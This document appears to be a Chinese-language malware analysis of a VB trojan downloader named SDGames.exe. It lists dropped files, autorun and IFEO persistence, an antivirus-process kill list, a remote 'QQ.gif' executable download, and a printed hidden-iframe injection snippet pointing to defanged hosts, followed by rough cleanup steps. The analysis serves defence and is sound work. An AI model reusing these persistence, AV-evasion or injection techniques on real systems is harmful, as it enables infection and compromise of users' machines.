文件名称:SDGames.exe
文件大小:59282 byte
A V命名:
Trojan.Win32.VB.yth(瑞星)
Trojan-Downloader.Win32.VB.lg(卡巴斯基)
Win32.Troj.Downloader.vb.237568(金山)
加壳方式:北斗4.1
编写语言:Microsoft Visual Basic 5.0 / 6.0
文件MD5:fc334ffcf5aff3ca8235705d61f62990
行为分析:
1、释放病毒副本:
C:\WINDOWS\system32\AUTORUN.INF 149 字节
C:\WINDOWS\system32\Avpser.cmd 1446 字节
C:\WINDOWS\system32\netshare.cmd 416 字节
C:\WINDOWS\system32\SDGames.exe 59282 字节
C:\WINDOWS\system32\Taskeep.vbs 612 字节
A-Z盘下生成:
AUTORUN.INF 149 字节, RHS
Recycleds.url 98 字节, A(回收站图标)
SDGames.exe 59282 字节, RHS
Windows.url 97 字节, A
新建文件夹.url 97 字节, A(文件夹图标)
在生成AUTORUN.INF前,会先调用RD命令删除免疫的AUTORUN.INF(如果有)
2、添加启动项:
(1)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
注册表值 Winstary = "C:\windows\system32\SDGames.exe"
(2)修改system.ini,加入Load和Run值:
路径为:C:\windows\system32\SDGames.exe
3、开启以下服务:
winmgmt
lanmanserver
禁用以下服务:
Alg
sharedaccess
4、禁用一些系统功能,比如显示隐藏文件、扩展名、任务管理器、CMD等。
5、修改Reg、Txt文件关联,为:C:\windows\system32\SDGames.exe。
6、IFEO重定向劫持,指向:C:\windows\system32\SDGames.exe。
都是一些比较有名气的安全工具,另外连QQ和影子进程都不放过。
7、Avpser.cmd则尝试关闭一些进程(列一部分):
%p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木马*
%p% 社区*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修复*
%p% 保护*
8、添加Guest账户,为空密码,权限为Administrator。
9、修改系统时间,为2030年。
10、通过直接获得系统内存隐藏进程,防止被结束。
11、释放Taskeep.vbs,这个应该互斥体,防止进程有多个病毒体在运行。
12、结束explorer.exe进程,并ping127.0.0.1,如果通畅,会下载一个文件,然后重新启动explorer:
hxxp://**.icpcn.com/QQ.gif
其实是个PE文件,具体是什么病毒还没看,不过测试时没有实现。
13、查找:
.jsp
.asp
.php
.htm
.html
.hta
并插入一段代码:
<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0"
src="hxxp://zh**.10mb.cn/" name="Myframe" align="center" border="0">
一个伪装百度的网站,不过下面挂了一个东西:
hxxp://xxx.bao01.com/0.js,失效了~~
14、修改IE主页,为hxxp://**.10mb.cn/。
15、跳过C盘,然后覆盖EXE文件。。(不可能恢复),图标为瓢虫模样。
16、还有一些乱七八糟的,就不写了~
另外这病毒传播方式不是很理想,所以不写解决方法了~
很麻烦滴~
思路是:
1、把SDGame.exe和一些重要的文件覆盖并阻止再生。可以用PowerRmv。
建议暂时删除系统文件taskkill.exe、net.exe、cmd.exe。等弄好后从Dllcache恢复。
不然你会发现计算机响应的速度让你无法忍受。>4核的忽略这步
2、修正系统时间,再下载SREng修改被禁用的XX...
3、那些EXE只能删除了。